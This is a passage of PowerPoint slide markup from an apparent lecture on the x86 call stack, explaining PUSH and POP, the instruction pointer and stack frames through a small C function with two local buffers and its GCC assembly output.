              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>PUSH adds an element at the top of the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>POP reduces the stack size by one by removing the last element at the top of the stack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4608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1C061BD2-B42A-43C1-8168-196BD952EF67}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>6</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dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>logical stack frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> contains the arguments to the function, the local variables declared in the function, and the data necessary to recover the logical stack frame of the previous function, including the value of the instruction pointer at the time of the function call.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> c) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>   char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>   char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>   // some other codes here  ... ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>("a");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>("b");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>("c");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4710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50F954F-4219-4DE6-8CB7-367B47A10223}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>7</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u="sng" dirty="0"/>
              <a:t>example1.s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.file	"example1.c"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.version	"01.01"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>gcc2_compiled.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.align 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.type	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>function,@function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.L1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.Lfe1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.size	 function,.Lfe1-function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.align 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.type	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>main,@function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $12,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.L2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.Lfe2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.size	 main,.Lfe2-main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.ident	"GCC: (GNU) egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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FF3E1A4-2B92-48AF-BEC7-1AE140BF8AE7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="855611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u="sng" dirty="0"/>
              <a:t>Instruction pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> stores the address of the next instruction to be executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>example1.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> c) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  function(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>example1.s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.file	"example1.c"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.version	"01.01"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>gcc2_compiled.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.align 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.type	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>function,@function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.L1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.Lfe1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.size	 function,.Lfe1-function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.align 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.type	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>main,@function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $12,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.L2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.Lfe2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.size	 main,.Lfe2-main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.ident	"GCC: (GNU) egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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538D0FAD-2531-49B6-9666-CC23F1D231B0}" type="slidenum">
